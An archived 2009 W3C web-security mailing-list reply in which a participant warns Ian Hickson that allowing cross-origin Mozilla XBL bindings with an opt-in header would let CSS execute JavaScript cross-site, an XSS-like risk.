Re: What is the same-origin policy for (was Re: The Origin header) from sird@rckc.at on 2009-12-07 (public-web-security@w3.org from December 2009)

From: <sird@rckc.at>
Date: Mon, 7 Dec 2009 16:30:01 +0800
To: Ian Hickson <ian@hixie.ch>
Cc: Devdatta <dev.akhawe@gmail.com>, public-web-security@w3.org
Message-ID: <8ba534860912070030xb7f10b4g4c1d0177472ca412@mail.gmail.com>

Ian, are you aware that that will provide CSS the power to execute
javascript cross-site? (think on XSS).

Right now we can't do this on firefox anymore, because they limited it to
same domain, but if this gets implemented then attacker.com will just send
the header so his script will be loaded.

I thought that was the reason moz bindings were disabled in the first place
=/ because noone wanted CSS to execute JS.

Greetings!!

-- Eduardo
http://www.sirdarckcat.net/

Sent from Hangzhou, 33, China

On Mon, Dec 7, 2009 at 3:28 PM, Ian Hickson <ian@hixie.ch> wrote:

> On Mon, 7 Dec 2009, sird@rckc.at wrote:
> >
> > a.example.com/mozbind.html
> >
> > or
> >
> > b.example.net/binding.xml
>
> Both. a.example.com/mozbind.html has to reference
> b.example.net/binding.xml, and b.example.net/binding.xml has to opt-in to
> supporting a.example.com.
>
> --
> Ian Hickson               U+1047E                )\._.,--....,'``.    fL
> http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
> Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
>

Received on Monday, 7 December 2009 08:30:54 UTC